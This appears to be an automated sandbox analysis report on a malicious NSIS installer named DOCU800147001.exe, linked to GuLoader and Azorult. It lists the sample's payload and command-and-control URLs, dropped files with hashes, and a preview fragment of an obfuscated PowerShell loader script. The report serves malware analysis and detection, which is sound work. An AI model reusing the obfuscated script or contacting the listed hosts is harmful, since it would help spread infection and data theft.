                        http://b2csa.icu/PL341/index.phpVVWTmsiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://nsis.sf.net/NSIS_ErrorErrorDOCU800147001.exe, DOCU800147001.exe.2.drfalse
                          high
                          https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://b2csa.icu/PL341/index.phpalmsiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://b2csa.icu/PL341/index.phpFvmsiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://nsis.sf.net/NSIS_ErrorDOCU800147001.exe, DOCU800147001.exe.2.drfalse
                              high
                              http://b2csa.icu/msiexec.exe, 00000008.00000002.2616759739.0000000006A02000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2616759739.00000000069DD000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://crl.micropowershell.exe, 00000002.00000002.2546703492.0000000008332000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2527630104.0000000004C41000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://contoso.com/powershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://b2csa.icu/P5msiexec.exe, 00000008.00000002.2616759739.00000000069DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2527630104.0000000004C41000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://b2csa.icu/PL341/index.phpjmsiexec.exe, 00000008.00000002.2616759739.0000000006A02000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          107.151.162.135
                                          electricsuitcase.netUnited States
                                          21859ZNETUSfalse
                                          104.21.32.1
                                          b2csa.icuUnited States
                                          13335CLOUDFLARENETUStrue
                                          Joe Sandbox version:42.0.0 Malachite
                                          Analysis ID:1592041
                                          Start date and time:2025-01-15 17:36:09 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 6m 5s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:9
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:DOCU800147001.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@6/15@2/2
                                          EGA Information:
                                          • Successful, ratio: 33.3%
                                          HCA Information:
                                          • Successful, ratio: 91%
                                          • Number of executed functions: 68
                                          • Number of non-executed functions: 27
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                          • Excluded IPs from analysis (whitelisted): 13.107.253.45, 52.149.20.212, 4.175.87.197
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target msiexec.exe, PID 1944 because there are no executed function
                                          • Execution Graph export aborted for target powershell.exe, PID 5664 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          TimeTypeDescription
                                          11:37:01API Interceptor37x Sleep call for process: powershell.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          107.151.162.13524010-KAPSON.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                          • electricsuitcase.net/wp-includes/block-bindings/wTryLAihFvcVmUK202.bin
                                          104.21.32.124010-KAPSON.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                          • b2csa.icu/PL341/index.php
                                          bIcqeSVPW6.exeGet hashmaliciousFormBookBrowse
                                          • www.rafconstrutora.online/sa6l/
                                          BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                          • www.aziziyeescortg.xyz/2pcx/
                                          25IvlOVEB1.exeGet hashmaliciousFormBookBrowse
                                          • www.masterqq.pro/3vdc/
                                          QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                          • www.mzkd6gp5.top/3u0p/
                                          SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                          • redroomaudio.com/administrator/index.php
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          electricsuitcase.net24010-KAPSON.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                          • 107.151.162.135
                                          b2csa.icu24010-KAPSON.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                          • 104.21.32.1
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ZNETUShttps://imtcoken.im/Get hashmaliciousUnknownBrowse
                                          • 199.91.74.184
                                          24010-KAPSON.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                          • 107.151.162.135
                                          https://hmflowcontrols.com/ch/CHFINAL/50477/Get hashmaliciousUnknownBrowse
                                          • 23.236.112.179
                                          http://www.telegramdd.org/Get hashmaliciousUnknownBrowse
                                          • 199.91.74.208
                                          http://www.telegramii.org/Get hashmaliciousUnknownBrowse
                                          • 199.91.74.209
                                          http://m.escritoresunidos.com/Get hashmaliciousUnknownBrowse
                                          • 199.91.74.209
                                          https://www.xietaoz.com/Get hashmaliciousUnknownBrowse
                                          • 199.91.74.185
                                          http://www.telegramhj.org/Get hashmaliciousUnknownBrowse
                                          • 199.91.74.208
                                          http://www.telegram-gd.com/Get hashmaliciousUnknownBrowse
                                          • 199.91.74.208
                                          https://whatsapp-cy.com/Get hashmaliciousUnknownBrowse
                                          • 199.91.74.184
                                          CLOUDFLARENETUSfirstontario.docxGet hashmaliciousUnknownBrowse
                                          • 1.1.1.1
                                          lummm_lzmb.exeGet hashmaliciousLummaCBrowse
                                          • 104.21.67.165
                                          https://solve.lzmb.org/awjsx.captcha?u=a85c9e46-f1ff-475f-b74c-c23cf236a082Get hashmaliciousUnknownBrowse
                                          • 104.21.78.33
                                          https://solve.xfzz.org/awjsx.captcha?u=c56ed68e-fc67-4e24-b8ac-6adc700e0877%20#%20%E2%9C%85%20''I%20am%20not%20a%20robot%20-%20reCAPTCHA%20Verification%20ID:%203467''Get hashmaliciousUnknownBrowse
                                          • 104.21.32.1
                                          https://tinyurl.com/AmconconstructionGet hashmaliciousUnknownBrowse
                                          • 104.17.25.14
                                          Zohobooks Voip CaIIer left (4) voice message from +1 (___) ___-__92 [MSG ID-zNeaDpAKAIgeQjKGl].emlGet hashmaliciousHTMLPhisherBrowse
                                          • 104.17.25.14
                                          https://bluefiles.com/fr/reader/document/2c33782e98658214c7dff875dd234fc3b9b9a60915ac1685fe35abcc657c139dGet hashmaliciousUnknownBrowse
                                          • 1.1.1.1
                                          https://u13762205.ct.sendgrid.net/ls/click?upn=u001.2N-2FFSd8Mh5tdTcK2pEXUToH0F5-2Fq3FDo8pnKFzcXMK24EOVQRPQXOzov3WP6TeQDbpOFMAzOhzk6g52qaRBXMg-3D-3DIjNL_PKcFXsnzduNOkTk1M1BuFSXBwpDtJ5JnfBBGS8mWfSDpSIzzZrzaRAqzsWn9I2SACyGbOCQAHofmU9ue-2Bfpl8m5UVDAXfATbU3zHgCM2w6TpOzhFbmwlUQoZzHTxRoJD6sBCzgzJz3SY7rmsp-2BquYHmL2DTOkQggmMFIfKhNPVaBf8NTmimDBPZdcr9YqjF8L6hryY10MBbjsSOUH778gw-3D-3DGet hashmaliciousUnknownBrowse
                                          • 104.18.10.207
                                          i686.elfGet hashmaliciousMiraiBrowse
                                          • 8.44.96.126
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Users\user\AppData\Local\Temp\nsx7F0.tmp\nsExec.dll#U8fdd#U89c4#U540d#U5355.exeGet hashmaliciousUnknownBrowse
                                            hnTW5HdWvY.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):53158
                                              Entropy (8bit):5.062687652912555
                                              Encrypted:false
                                              SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                              MD5:5D430F1344CE89737902AEC47C61C930
                                              SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                              SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                              SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                              Process:C:\Users\user\Desktop\DOCU800147001.exe
                                              File Type:Unicode text, UTF-8 text, with very long lines (4303), with CRLF, LF line terminators
                                              Category:dropped
                                              Size (bytes):71505
                                              Entropy (8bit):5.166626957385969
                                              Encrypted:false
                                              SSDEEP:1536:3pkD/PCEXDxGNlmE3u1u0vzMBj8HuPavptArCLB8+iqj:ZkD/rzVCuk07MBwvxtAro5xj
                                              MD5:DCD80EB1AD2E5394274FFDCE163D4815
                                              SHA1:F409BB772F6FCACE2AE9505DBF1764186178158F
                                              SHA-256:16743054909C0B954ADECE9179B026560C1671DB30E2CB397DDC4C3742C57BC4
                                              SHA-512:8FA32C316430DB3E59401ADD31221F2B46EF56732F1CBE8D02576CB140163B189B7EFFC43223F3F59DE80BD936231B1032A4673980BE7653EBE647E9EBAA1ED5
                                              Malicious:true
                                              Reputation:low
                                              Preview:$Udviskes=$Tricorporate;........$Allagite = @'.Nedkast. Monoc.$MarkereHhoofyp oVgtfyldo,eversesSlyngedeUdtry sg ElectroFolk stwCamellus Grshop=Unawkwa$Di itriUNona.midP eurotsDemokratSockmake DelmoddUd aden;Genvo d.GamgiagfUndithyuLr rbalnActinolcOverreatKalk,aniClankinoSpecie nSnorkel SoutherCCentrifoNoto relSerieprpPeerl.soArseniatFuldstnoBoer,temBertramiReversieSoundbosLandshe Unruef(Gramsci$Erhv,rvPBiberetrHorograarangstieannabeldCineritiS.ttepaaAutologlEgn udv,Antilyt$SynchroIEnclavinViderekeSgne agxEs ancipSibilateCannibarHjemlertUnpate sineffi ) Di sek Exorcis{Semia a.Handlin.hydroxy$DyslektUImpreg,nGalletarSa arita Foxi,edSek.teniElimin cFamilisaAposioplhanapstiProvokaz Mi jree DecamesHanap.r F,gocyt(AlcedinSDawtieeoAftensvv,ngakorsTitelreeAfs,idnkV.vensoa Icon mnOmg geld Unso eeArereelnMorrowt Hystren'todagesITaffel nNabonuldAxemenaaUlve.ornTrotskiksmadder Recusee$Syv iledSexdrifeRari anmGuidewaiforstuvdR flektoAidmanrmModgaarPTimotqx Bo,tvanOStaldbrpCoriamy KommanrC,iticia
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Category:dropped
                                              Size (bytes):963872
                                              Entropy (8bit):7.674079791252531
                                              Encrypted:false
                                              SSDEEP:24576:YuA8/BOypdAGTekMh6RJNBIQll+hQT2jiux5A:+IBOypdAGTRrRFIQlluQsxq
                                              MD5:AB99E49A4471901468BBBD9CCF228DE0
                                              SHA1:2B7302E1B24A9994E2924E97E627C1F5DE23EAAA
                                              SHA-256:8F856E9882D312F6A51F265796C6A68C1914D1C51C59FC1964484FA5AC130F34
                                              SHA-512:BCDA816D71AAB2B798ED2D2764099EEA01CE51C9A276377A0D5CA3AED4AAF328D700204DBBC8539D16EB70529D390D7113E7700C98652CAA4512C2979EF9313C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 18%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x......z...x..........i...,"..t.......y...Richx...........................PE..L....f.R.................\....9......0.......p....@..........................@=..............................................s....... ;................. ............................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data.....9..........r..............@....ndata....... :..........................rsrc........ ;......v..............@..@................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              Process:C:\Users\user\Desktop\DOCU800147001.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1526575
                                              Entropy (8bit):0.29530349075836504
                                              Encrypted:false
                                              SSDEEP:768:ASVaka6XCOUX+4bFIT0hio6OHaHuPqo8MObUS8wQ9x2q0gQIsH9f9aoDpvfPUGRM:TLDlBdK
                                              MD5:B12744C545F373B12899405E7B06703C
                                              SHA1:00444A0C0ED55B4BCBD428E9367C48B943E6B6E5
                                              SHA-256:3F08EB75471C7749CF2832874DFE9D87D7C92F6C0B287F44C61BA87132DBB6B5
                                              SHA-512:356BC941E6D7E77BBC6809C2E8B7835DAF26A649478FAD3BBF96CC0FF5F7AC5380433A7BDF1706778E2E3AD60932E91C3FCFD6A2D161F25A19626396BFB7F2C7
                                              Malicious:false
                                              Preview:.........................&...........................................................................................................................................................................?..................................................................U..................................................................................!................d...........................................................................................A.........................................................E.........................................................................Q.....................................................................................................................................................................................................................................................................................................................................x.....................................................................................
                                              Process:C:\Users\user\Desktop\DOCU800147001.exe
                                              File Type:ASCII text, with very long lines (382), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):455
                                              Entropy (8bit):4.237067132953465
                                              Encrypted:false
                                              SSDEEP:12:EBdbnteRhtBkSebie21b+Kdg6B3nmhBKnTy19h:EX49MGJfg6FnlToL
                                              MD5:C66131BE12E218CB451A5CDEFEFD93EF
                                              SHA1:5D3EFE4F715281097AC9EF67580349088D89D858
                                              SHA-256:FA8A7D0FAD17FACB47C04904463406343D46E9E4A6932231F64EE2BCD8562C36
                                              SHA-512:3F71B278BB06786AF7422846520BFCDADAF5D7FD64A1AB3023210FA7A82B1FD3C18E504DDEC18B5CE7F931A966C30C1738234592A51B59AB79BEA69D24C998ED
                                              Malicious:false
                                              Preview:vrdistigningen opsamlingsdepoter archwife streetlike roeoptagerne tantalifluoride tightlier,gdningsopbevaringer bouncingly heroarchy tetragonus recivilize grundendes bsses,kortege azotin daarligdom briggsk insularize spenses cadges,kallunerne eradicate ultraconfident tallerkenfuld skredet aya.smkfyldtes vulkaner sengevderne hldedes temperere poetizers dotering stangende talenttrf..iridium hanny hoghead ergotist frygtendes samarkand rrigere strmmedes..
                                              Process:C:\Users\user\Desktop\DOCU800147001.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):4656676
                                              Entropy (8bit):0.2967284544570692
                                              Encrypted:false
                                              SSDEEP:768:9kAMMC60OOax4t/q+BXJum2LG6Y59t54dkUOfsnutif04CG4Fz20jIz7U+376EyQ:6MRjkS1bFdh1k8Z8ZJWVmInj
                                              MD5:5A6329442D47F58811E3D0AB09312866
                                              SHA1:D84BD4A23998795019EF4F370535ED5DD7AFC97E
                                              SHA-256:B146D608F302E262857711B5E9A9B0FD4409E952A025854F36B9E2D9325E0FCE
                                              SHA-512:48F26A08F614182D59EC010B1106D0E05CF55C9F48AE70F706435E41D92E786E9C9E78008DE26E6136A154D0D3D2B92FE519FC3157940BC2F34F3DAAD75B3D47
                                              Malicious:false
                                              Preview:...............................................................g.......................................................................................,................................................................................................................................................................................................................................>.....................................................................................................................................................................G..............................................................................................................w...l............................................................................................................d.........................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\DOCU800147001.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2400319
                                              Entropy (8bit):0.2970727664331768
                                              Encrypted:false
                                              SSDEEP:768:QYEycGQ020iR3UzxToaNbm/CQIHqWHLCk1jPFAsKWj2BqcuzyxA41UqJFmTzU3os:csTf/jhESARl/
                                              MD5:AEE4BB6A9E3BD66FD8D2C7F9F20D6C75
                                              SHA1:BDAB62C341DFEC94CB2E8D27C35531D8A849541E
                                              SHA-256:5ECDFCC07F21D459544978A2CC6CE6CEA67E9CA8BC46D7CA0B069E6F492BD4A3
                                              SHA-512:E2EAE217804C6596D2D23025CE1358CFB8FAFFDA09DE89C93E044838F18E83237094BEF872D49BF99F47326272876A47E6E236D6DB0106B56DF42BE7C5F82472
                                              Malicious:false
                                              Preview:.............._...............................................................................................................................................,.........................................................................................................................................................................................................................................................................................................................................................................................n..............................................................................................................................................................................................................................................................................................................................................................!...............................................................................................................
                                              Process:C:\Users\user\Desktop\DOCU800147001.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2221689
                                              Entropy (8bit):0.2975722061630014
                                              Encrypted:false
                                              SSDEEP:768:oiVj0sDGFYdWIWsIdL0HBu2W06kRV073deJ5twc39KRw7kbrGgu/hIgh6QxBPK6I:bjJjsTWRuje
                                              MD5:6630050C1BC0F9002CFFD4E3878AF422
                                              SHA1:EDEF39DB60837C4CBA254AAB55D03D3566C3ECA8
                                              SHA-256:40E701BA7606B5251E9E5F3B6376B0AB06DBBA76BE2DB51814F9A6335FC673C4
                                              SHA-512:899B32617790B94FCFBDB3ABDCD3CDCA899735851416BEDBF1533123E4E92491A612A3D223FC051D16FA04C28BB74721F45705BF98E4B1C462C1C813BAEAA2D2
                                              Malicious:false
                                              Preview:.................................................................................................................................................................C...................................................................................................................................................................m............................................................................................................................................................................................Z.....................................k..............................................................................................................................................................................=........................................................................................................................1.....................................r......................................................7...................................................Y......
                                              Process:C:\Users\user\Desktop\DOCU800147001.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):359849
                                              Entropy (8bit):7.600028553847548
                                              Encrypted:false
                                              SSDEEP:6144:VLhZ6DqSZZ1oTW97PURnyz+/+2ysYwEyfwqF8YvF+yGImhDG00:+qKwW97PU0z+N5IqFlGi00
                                              MD5:9CAE95341FEE19C573B15CDEBA15077B
                                              SHA1:91CD113B2FF21CC6A1C2B11D0812080B61C6CB68
                                              SHA-256:9CB1A6246F58400EB6C3319E2CA0524BD8392FA23E727439706DC77F7F021EE5
                                              SHA-512:92464C29B5F4F652622C9B5EE74BFE706CBC3335892461C44EFFCF82902D7A4DE5087C8D00724F6900F23F9D7AC8E3B990C82BD784E6FF8F1525940F55FE57C2
                                              Malicious:false
                                              Preview:.......----.......Y......eeee.........$....................99......................T..........................}.fff..fff...+..a.........55...B................. .,........[[.......................................II.e......................00......|..jj..........?...d........hh...:..............................^...........f...............................L.88...........e........................... ..................................]..||.SS....d.........]................c.............,..,...`.......|...zz...&&..............$.....2...........d....................R.x........GGG.....PP........ .=.......g..o.....SS....PPPPP.,.@....c......................................O..........................W.....s.........V.................O.............v.>.........##..UUU......."""...............................................................aa.................._....T.lll....E.......l...:..gg.........mmmm...@.....PPP.....N.......S.|.....7..........&&.###....FFFF.ZZ.....OO..N............,..a.........
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Users\user\Desktop\DOCU800147001.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):6656
                                              Entropy (8bit):5.028908901377071
                                              Encrypted:false
                                              SSDEEP:96:W7GUaYNwCLuGFctpiKFlYJ8hH4RVHpwdEeY3kRlDr6dMqqyVgN738:Iygp3FcHi0xhYMR8dMqJVgN
                                              MD5:51E63A9C5D6D230EF1C421B2ECCD45DC
                                              SHA1:C499CDAD5C613D71ED3F7E93360F1BBC5748C45D
                                              SHA-256:CD8496A3802378391EC425DEC424A14F5D30E242F192EC4EB022D767F9A2480F
                                              SHA-512:C23D713C3C834B3397C2A199490AED28F28D21F5781205C24DF5E1E32365985C8A55BE58F06979DF09222740FFA51F4DA764EBC3D912CD0C9D56AB6A33CAB522
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: #U8fdd#U89c4#U540d#U5355.exe, Detection: malicious, Browse
                                              • Filename: hnTW5HdWvY.exe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L....f.R...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text...J........................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.674079791252531
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 92.16%
                                              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:DOCU800147001.exe
                                              File size:963'872 bytes
                                              MD5:ab99e49a4471901468bbbd9ccf228de0
                                              SHA1:2b7302e1b24a9994e2924e97e627c1f5de23eaaa
                                              SHA256:8f856e9882d312f6a51f265796c6a68c1914d1c51c59fc1964484fa5ac130f34
                                              SHA512:bcda816d71aab2b798ed2d2764099eea01ce51c9a276377a0d5ca3aed4aaf328d700204dbbc8539d16eb70529d390d7113e7700c98652caa4512c2979ef9313c
                                              SSDEEP:24576:YuA8/BOypdAGTekMh6RJNBIQll+hQT2jiux5A:+IBOypdAGTRrRFIQlluQsxq
                                              TLSH:22251236FEE3C46BE409AA75D89382F45B76AC16BA48036F37433F3E5E721D18805661
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x.......z...x...........i...,"..t.......y...Richx...........................PE..L....f.R.................\....9....
                                              Icon Hash:1b634b231d890b07
                                              Entrypoint:0x4030cb
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                              Time Stamp:0x52BA669C [Wed Dec 25 05:01:16 2013 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:e160ef8e55bb9d162da4e266afd9eef3
                                              Signature Valid:false
                                              Signature Issuer:CN=Erythritic, E=Penibelt@Konebytningers.Pr, O=Erythritic, L=Little Elm, OU="Besaaende Unfreezable ", S=Texas, C=US
                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                              Error Number:-2146762487
                                              Not Before, Not After
                                              • 13/12/2024 10:19:36 13/12/2025 10:19:36
                                              Subject Chain
                                              • CN=Erythritic, E=Penibelt@Konebytningers.Pr, O=Erythritic, L=Little Elm, OU="Besaaende Unfreezable ", S=Texas, C=US
                                              Version:3
                                              Thumbprint MD5:D1F2F8B59AB2B15679C32B0FD86A61A1
